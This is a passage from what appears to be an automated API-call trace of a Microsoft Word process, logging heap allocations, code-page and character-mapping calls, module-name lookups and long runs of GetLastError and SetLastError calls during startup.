(x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0118.921] GetEnvironmentStringsW () returned 0x102a3270* [0118.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1410 [0118.921] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x582) returned 0xcaae550 [0118.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0xcaae550, cbMultiByte=1410, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1410 [0118.921] FreeEnvironmentStringsW (penv=0x102a3270) returned 1 [0118.921] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x18) returned 0xc792850 [0118.921] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x800) returned 0xb3d76b8 [0118.921] GetStartupInfoW (in: lpStartupInfo=0x6f75d8 | out: lpStartupInfo=0x6f75d8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xeec2da4e, hStdOutput=0x6f764c, hStdError=0x690f9f38)) [0118.921] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0118.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0118.921] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.921] GetLastError () returned 0x7f [0118.921] SetLastError (dwErrCode=0x7f) [0118.922] GetLastError () returned 0x7f [0118.922] SetLastError (dwErrCode=0x7f) [0118.922] GetLastError () returned 0x7f [0118.922] SetLastError (dwErrCode=0x7f) [0118.922] GetACP () returned 0x4e4 [0118.922] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x220) returned 0xca73c18 [0118.922] GetLastError () returned 0x7f [0118.922] SetLastError (dwErrCode=0x7f) [0118.922] IsValidCodePage (CodePage=0x4e4) returned 1 [0118.922] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6f75dc | out: lpCPInfo=0x6f75dc) returned 1 [0118.922] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6f70a4 | out: lpCPInfo=0x6f70a4) returned 1 [0118.923] GetLastError () returned 0x7f [0118.923] SetLastError (dwErrCode=0x7f) [0118.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x6f6e28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.923] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x6f70b8 | out: lpCharType=0x6f70b8) returned 1 [0118.923] GetLastError () returned 0x7f [0118.924] SetLastError (dwErrCode=0x7f) [0118.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x6f6df8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6f6be8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0118.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x6f73b8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ×îzEôuo", lpUsedDefaultChar=0x0) returned 256 [0118.924] GetLastError () returned 0x7f [0118.924] SetLastError (dwErrCode=0x7f) [0118.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6f74b8, cbMultiByte=256, lpWideCharStr=0x6f6e08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.928] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.928] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6f6bf8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0118.928] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x6f72b8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ×îzEôuo", lpUsedDefaultChar=0x0) returned 256 [0118.928] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6911c640, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0118.929] GetLastError () returned 0x0 [0118.929] SetLastError (dwErrCode=0x0) [0118.929] GetLastError () returned 0x0 [0118.929] SetLastError (dwErrCode=0x0) [0118.929] GetLastError () returned 0x0 [0118.929] SetLastError (dwErrCode=0x0) [0118.929] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.931] SetLastError (dwErrCode=0x0) [0118.931] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.932] SetLastError (dwErrCode=0x0) [0118.932] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.933] SetLastError (dwErrCode=0x0) [0118.933] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.934] GetLastError () returned 0x0 [0118.934] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.935] GetLastError () returned 0x0 [0118.935] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4c) returned 0xca655b8 [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.936] GetLastError () returned 0x0 [0118.936] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.937] GetLastError () returned 0x0 [0118.937] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.938] SetLastError (dwErrCode=0x0) [0118.938] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.939] GetLastError () returned 0x0 [0118.939] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.940] SetLastError (dwErrCode=0x0) [0118.940] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) 